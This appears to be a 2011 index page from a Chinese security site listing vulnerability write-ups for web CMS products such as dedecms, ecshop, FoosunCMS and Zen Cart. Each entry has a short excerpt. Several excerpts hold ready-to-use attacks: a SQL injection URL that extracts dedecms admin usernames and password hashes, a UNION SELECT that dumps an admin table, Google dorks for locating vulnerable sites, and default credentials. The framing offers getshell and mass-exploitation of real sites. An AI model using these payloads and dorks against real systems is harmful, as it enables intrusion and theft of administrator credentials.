首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  vsserver
  当前位置:主页>安全文章>文章资料>漏洞资料>列表
网奇CWMS企业网站管理系统3.0编辑器漏洞
  日期:2011-06-27 16:38:12 点击:131 评论:0
网奇CWMS企业网站管理系统 功能特色 1. 采用微软ASP.NET 2.0(C #)设计,功能强,安全性高。 2. 分层设计模式,页面高速缓存,运行速度快。 3 . 通过xml配置语言,国际 ... google:Powered by wqCWMS 3.0 默认账号密码: wangqi wagnqi 演示站 http://cwms.wangqi.com
dedecms 5.6 RSS订阅页面注入漏洞及防范
  日期:2011-06-27 16:37:54 点击:59 评论:0
uploads/plus/rss.php?tid=1_Cs[][1]=1_Cs[2%29%29%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT%20CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23%27][0]=1 利用环境有点鸡肋: GPC off 有updatexml函数 防范:官方已出
DeDecms xss 通杀0day 附getshell EXP
  日期:2011-06-27 16:37:14 点击:244 评论:0
作者:haris 漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行 目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。 下面说说利用方法。 条件有3个: 1.开启注册 2.开启投稿 3.管理员很勤劳,会去审核文章,最鸡肋的地方了 注册会员-发表文章 内容填写:
极速安康学校网站程序 v3.1.1 cookie注入漏洞
  日期:2011-06-23 15:19:59 点击:150 评论:0
软件介绍[版权声明] PS:好像是oyaya的内核. 使用本系统注意事项: 1,本程序由极速安康开发,象征性的收取一点费用供大家使用! 2,本系统为共享程序,用户自由选择是否使用,在使用中出现任何问题而造成的损失极速安康不负任何责任! 3,尊重作者劳动成果,希望各位在使用
关于firefox的2个插件的漏洞
  日期:2011-06-23 15:18:31 点击:71 评论:0
关于firefox的2个插件的漏洞 文/superhei 2011年06月22日 一、火狐魔镜 1.Exp: http://www.80vul.com/firefox/firefox-cn-nday.html !-- var file = Components.classes[@mozilla.org/file/local;1].createInstance(Components.interfaces.nsILocalFile); file.initWit
5UCMS最新注入漏洞
  日期:2011-06-21 14:20:27 点击:85 评论:0
有一次不小心发现了5UCMS一个小漏洞。漏洞文件 后台目录/ajax.asp 因未进行后台用户验证,导致未登陆也可访问此文件,文件存在sql注入。 我今天进官方看了下好象漏洞他们已经发出了修复公告了,这里我把利用公布出来 直接暴出后台帐号密码。 http://www.hackqing.com/a
ecshop最新版 (v272) 本地包含拿SHELL
  日期:2011-06-21 14:19:21 点击:102 评论:0
直接看代码: js/calendar.php $lang = (!empty($_GET['lang'])) ? trim($_GET['lang']) : zh_cn;//没有过滤,很明显的包含漏洞 if (!file_exists(../languages/ . $lang . /calendar.php)) { $lang = zh_cn; } require(dirname(dirname(__FILE__)) . /data/config.php
rgboard <=4.2.0 任意文件下载漏洞
  日期:2011-06-21 14:17:48 点击:59 评论:0
rgboard是韩国的一款php论坛 这是一个标准的逻辑漏洞 spam_img.php代码如下 $schk_code = $_SESSION[schk_.$chk_code]; if(preg_match('/^[0-9]/',$schk_code[$ord])) { // ???? $file='images_spam/'.$schk_code[$ord]..gif; } else if(preg_match('/^[a-z]/',$schk_c
eFront添加管理员CSRF漏洞
  日期:2011-06-14 11:47:01 点击:92 评论:0
eFront 是一款针对于中小型企业、学校、政府提供的PHP内容管理系统,由于设计上的缺陷,导致远程添加管理、修改管理配置等多个跨站请求伪造漏洞(CSRF),该漏洞导致网站敏感信息泄漏。 官方网站:http://www.efrontlearning.net/ 漏洞类型:CSRF、跨站请求伪造 谷歌关键
BOSSI 公司(企业)网站管理系统注入&上传漏洞利用
  日期:2011-06-13 11:26:55 点击:68 评论:0
BOSSI 公司(企业)网站管理系统,中英文双语版,后台在同一页内同时管理添加修改资料内的中英文内容,网站的左边栏使用了模块,可以自由的增加删除,可以不用修改代码,让不懂编写网页的人也可以有自己的公司(企业)网站,基本资料都在后台管理添加修改,网站的标题、地址、版
Hishop 5.4&5.4.1 SQL 注入漏洞EXP
  日期:2011-06-13 11:25:46 点击:99 评论:0
Hishop网店系统V5.4正式版是海商网络拥有产权自主开发的基于WEB应用的B/S架构的B2C网上商城系统,主要面向企业和大中型网商提供最佳保障,最大化满足客户目前及今后的独立网店应用需求。该系统运行于微软公司的.NET 平台,采用最新的ASP.NET 2.0技术进行分层开发。通过
教育站漏洞批量拿shell
  日期:2011-06-13 11:25:31 点击:237 评论:0
教育站打印页面漏洞 google搜索 inurl:info_Print.asp?ArticleID= 默认后台:website/ad_login.asp 爆管理员密码: union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin 经过测试,大部分都可以爆出来
dedecms 5.7后台拿SHELL
  日期:2011-06-13 11:24:06 点击:412 评论:0
dedecms 5.7教之前的版本有了很大的改进, 修复了5.6以下版本严重的上传0day; 相当的鸡肋,前提是有了后台权限。 由于系统自带的文件管理器插件没有过滤文件上传及编辑后保存的文件名, 导致直接写入webshell漏洞。 漏洞测试: 1、进入后台,默认的是dede, http://ww
Discuz!7.0-7.2和Phpwind7.5后台鸡肋漏洞
  日期:2011-06-07 10:53:50 点击:45 评论:0
很多人有了,流传出来了,然后发出来。现在的漏洞,如果主动公布的,肯定是无鸡肋不公布,否则肯定是藏着,除非别人公布了。DZ的鸡肋在于需要创建者的权限(创建者的密码一般比较难搞),pw的鸡肋在于需要截断(或者linux旁注写一个shell到tmp下)。 一、discuz后台sett
Foxmail Server上传漏洞&任意文件下载漏洞
  日期:2011-06-02 12:04:17 点击:52 评论:0
Foxmail Server是专为国人设计的邮件服务器软件,提供多种邮件服务,用户可以用Foxmail、Outlook等客户端软件收发邮件,也可以在美观易用的中文Web界面上登陆处理邮件。 user/download.asp 存在任意文件下载漏洞 user/filesMain.asp?fmFileType=image 文件上传漏洞 由于
讯时网站管理系统CMS v4.0以下版本暴库漏洞
  日期:2011-05-31 12:01:59 点击:77 评论:0
讯时网站管理系统一款界面清爽、操作体验极好的ASP网站管理系统,而且免费开源,尤其是这套系统的新闻部分非常深受各位站长的喜爱,使用时,这个CMS系统的首页需要你自己设计一个模板,然后由后台设置后进行JS调用。因此后台的功能比较完备. 可能就是因为程序员疏忽数
风讯(FoosunCMS) SetNextOptions.asp注入漏洞利用
  日期:2011-05-30 10:33:00 点击:254 评论:1
FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件,国内领先的第一款开源的、集成web2.0元素的、模块化的CMS建站系统。 风讯foosun的注册文件存在漏洞,可以暴管理员帐号和密码。 漏洞文件: http://www. hackqing .com/user/SetNextOptions
Zen Cart 商城系统,上传、跨站漏洞利用
  日期:2011-05-24 10:58:05 点击:114 评论:0
Zen Cart是开源、免费的商城系统,用于建立专业的网上商店。Zen Cart 支持多语言、多货币、搜索引擎优化、批量更新,是最安全的网店系统之一。Zen Cart = v1.3.9存在XSS跨站、脚本上传、路径披露等多个漏洞。 谷歌关键词:intext:Powered by Zen Cart 爆路径: http://w
Mathew Callingham Associatess内容管理系统(fckeditor) 上传漏洞利用
  日期:2011-05-24 10:57:21 点击:39 评论:0
Mathew Callingham Associatess是一款基于PHP+MYSQL的内容管理系统,由于Mathew Callingham Associatess 3.x.x集成了fckeditor编辑器,导致也继承了fckeditor的上传漏洞,另外该系统还存在sql注入漏洞。 谷歌关键词:Designed by Mathew Callingham Associates 漏洞测
simple-log v1.3.1 注入漏洞
  日期:2011-05-23 10:43:25 点击:49 评论:0
Simple-Log 是基于PHP+MySQL的开源免费博客系统,系统轻巧运行速度飞快并具有很好的可扩展性. 程序下载 http://down.cnzz.cn/Info/57357.aspx ---------------------------------------------- 刚买到vps,打算装个blog系统,看到simple-log比较简洁,就下了最新的装了
共37页/730条记录 首页 上一页 [4] [5] [6] 7 [8] [9] [10] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  入侵实例
  Exploits
  系统安全
  网络安全
  网络基础
  病毒分析
漏洞资料
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved